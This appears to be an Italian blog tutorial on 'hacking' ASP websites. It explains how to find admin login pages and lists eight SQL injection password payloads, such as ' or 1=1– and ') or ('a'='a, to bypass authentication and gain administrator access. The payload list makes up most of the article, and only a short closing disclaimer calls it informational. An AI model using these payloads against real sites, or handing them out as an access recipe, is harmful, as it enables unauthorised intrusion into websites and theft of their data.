Hackerare siti ASP

ASP è un linguaggio dinamico che viene spesso utilizzato per garantire il servizio di alcune pagine web. Tuttavia, quando i programmatori scrivono il futuro sito, commettono frequentemente degli errori che vengono successivamente utilizzati dai malintenzionati per acquisire particolari privilegi sul servizio online. Non si tratta assolutamente di qualcosa di estremamente difficile, bensì questa vulnerabilità sfrutta il procedimento SQL injection per essere attuata. Già in precedenza abbiamo parlato di questa tecnica e anche questa volta si basa sull’iniettare linee di codici che potranno permetterci di avere a disposizione i permessi di amministratore, a patto che il sito sia realmente vulnerabile. Dunque, cominciamo! Per prima cosa rechiamoci nel pannello di accesso all’area riservata amministratore del sito. Di solito per arrivare alla pagina di login bisogna aggiungere alla query diciture come “admin/login.asp” oppure “login-admin.asp”. Bene, una volta giunti in questa pagina potete provare varie opzioni, inserendo combinazioni che potrebbero riuscire a forzare l’accesso al sito ASP. I procedimenti che potete seguire sono i seguenti:

nome utente: admin

password: 1 OR 1=1


nome utente: admin

password: ‘ or 1=1–


nome utente: admin

password: ” or 1=1–


nome utente: admin

password: or 1=1–


nome utente: admin

password: ‘ or ‘a’=’a


nome utente: admin

password: ” or “a”=”a


nome utente: admin

password: ‘) or (‘a’=’a


nome utente: admin

password: “) or (“a”=”


Come abbiamo visto è importante, durante la programmazione di un sito, non lasciarsi dietro alcune falle, che potrebbero rilevarsi fatali per la sicurezza dei dati. Ovviamente l’articolo è da intendersi come guida informativa e non come incitazione a compiere atti di pirateria informatica, severamente punibili dalla legge. Ne io ne tutta la redazione di Start And Go si assume la responsabilità di eventuali usi scorretti che ne farete delle info qui riportate.